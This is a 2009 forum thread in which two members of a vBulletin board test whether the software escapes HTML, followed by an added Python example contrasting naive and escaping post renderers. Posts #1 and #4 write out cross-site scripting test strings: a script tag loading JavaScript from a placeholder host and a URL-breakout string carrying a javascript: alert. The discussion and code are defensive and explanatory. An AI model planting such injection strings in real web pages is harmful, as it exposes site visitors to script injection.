TapcisForum  

  #1  
September 19th, 2009, 10:32 AM
davidh
Member

Join Date: May 2005
Posts: 1,935
dummy hack test

<script src="http://_.com/_.js"></script>

If you do not see the above line of text, then there is a problem.

If the forum software had not converted the line containing the HTML tags, etc. into this:

&lt;script src=&quot;http://_.com/_.js&quot;&gt;&lt;/script&gt;

then it would have been possible to attempt to run a js script from anywhere on the web in your browser.

"dummy" means 1. it's not a real test and/or 2. the poster
__________________
DH

  #2  
September 19th, 2009, 04:23 PM
sidney
biocryptologist

Join Date: May 2005
Location: New Zealand
Posts: 1,091

Quote:
Originally Posted by davidh View Post
<script src="http://_.com/_.js"></script>

If you do not see the above line of text, then there is a problem.

VBulletin has been around for a while and such security holes would have been closed a long time ago.

This site uses the option to disable all HTML in messages, using bbcode tags only. That's the simplest and safest option.

However, it does turn a URL string into HTML. Notice what it did in your message. If the proper security is in place it would not turn it into a URL that will execute JavaScript. Hmm, I should check that but I have to run out the door in two minutes.

  #3  
September 19th, 2009, 05:36 PM
davidh
Member

Join Date: May 2005
Posts: 1,935

Quote:
Originally Posted by sidney View Post
VBulletin has been around for a while and such security holes would have been closed a long time ago.

This site uses the option to disable all HTML in messages, using bbcode tags only. That's the simplest and safest option.

However, it does turn a URL string into HTML. Notice what it did in your message. If the proper security is in place it would not turn it into a URL that will execute JavaScript. Hmm, I should check that but I have to run out the door in two minutes.

I tried using the "Insert link" icon on the tool bar to paste the line of text in question, namely
<script src="http://_.com/_.js"></script>
as the contents of the URL and a click on "Preview Post" showed that the forum software had inserted zero, zilch, nada, thus blocking this kind of attack via the "Insert link" function.

As you say, I would have expected that such potential vulnerabilities have been closed long ago. I did not really expect to be able to show up any vulnerability in the first place. The main point of my OP was to show how little text is required to create an attack that could work without any clicking on any link by the user at all, if some vulnerabilities on both sides (server and browser) are unpatched.
__________________
DH

  #4  
September 19th, 2009, 06:12 PM
sidney
biocryptologist

Join Date: May 2005
Location: New Zealand
Posts: 1,091

Quote:
Originally Posted by davidh View Post
The main point of my OP was to show how little text is required to create an attack that could work without any clicking on any link by the user at all, if some vulnerabilities on both sides (server and browser) are unpatched.

Yes, and it can be quite a challenge to allow users to enter some HTML without allowing any malicious HTML. Since HTML is disabled in posts here the job is quite a bit easier. The remaining tricky part is in the code that parses URL strings such as http://example.com to make sure that it can't be fooled by something like http://example.com"><href='javascript:alert("foo")'> (which I expect will show up with only the http://example.com part of it being a hot link -- ok, this is my test - [UPDATE:] I see that the code is even more clever -- It saw something is wrong and disables hot linking the entire attempt at a hack)

  #5  
September 19th, 2009, 09:16 PM
davidh
Member

Join Date: May 2005
Posts: 1,935

Quote:
Originally Posted by sidney View Post
it can be quite a challenge to allow users to enter some HTML without allowing any malicious HTML.

Sounds like about the same level of difficulty as having a girls plus boys slumber party with non-segregated bedrooms and NO hanky panky.
__________________
DH
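
The entity conversion davidh describes in post #1 and the URL-parsing pitfall sidney raises in post #4, sketched in Python as an added example that is not part of the thread and is not vBulletin's code. The names `render_naive` and `render_safe` and the link rule are assumptions for illustration: only the clean `http(s)` prefix becomes a link, which is the outcome sidney first expected rather than the stricter one he observed.

```python
import html
import re
from urllib.parse import urlsplit

# A bare URL ends at whitespace, a quote or an angle bracket, so markup
# glued onto the end of a URL can never become part of the href value.
URL_RE = re.compile(r"https?://[^\s\"'<>]+")


def render_naive(post: str) -> str:
    """Weak renderer: links anything after http(s):// and escapes nothing."""
    return re.sub(r"(https?://\S+)", r'<a href="\1">\1</a>', post)


def _link_or_text(url: str) -> str:
    """Return an anchor for a well-formed http(s) URL, else escaped text."""
    safe = html.escape(url, quote=True)
    try:
        parts = urlsplit(url)
    except ValueError:  # e.g. an unbalanced '[' in the host part
        return safe
    if parts.scheme in ("http", "https") and parts.hostname:
        return f'<a href="{safe}" rel="nofollow">{safe}</a>'
    return safe


def render_safe(post: str) -> str:
    """HTML disabled: escape all text; only clean http(s) URLs become links."""
    out, pos = [], 0
    for m in URL_RE.finditer(post):
        out.append(html.escape(post[pos:m.start()], quote=True))
        out.append(_link_or_text(m.group(0)))
        pos = m.end()
    out.append(html.escape(post[pos:], quote=True))
    return "".join(out)


# The two strings posted in this thread (post #1 and post #4).
SCRIPT_TAG = '<script src="http://_.com/_.js"></script>'
URL_BREAKOUT = 'http://example.com"><href=\'javascript:alert("foo")\'>'

if __name__ == "__main__":
    for sample in (SCRIPT_TAG, URL_BREAKOUT):
        print("naive:", render_naive(sample))
        print("safe: ", render_safe(sample))
```

In the safe output the only raw `<` characters belong to the anchor the renderer itself emits; everything the poster typed arrives as entities.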
Posting Rules

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

All times are GMT -5.


Powered by vBulletin® Version 3.7.4
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.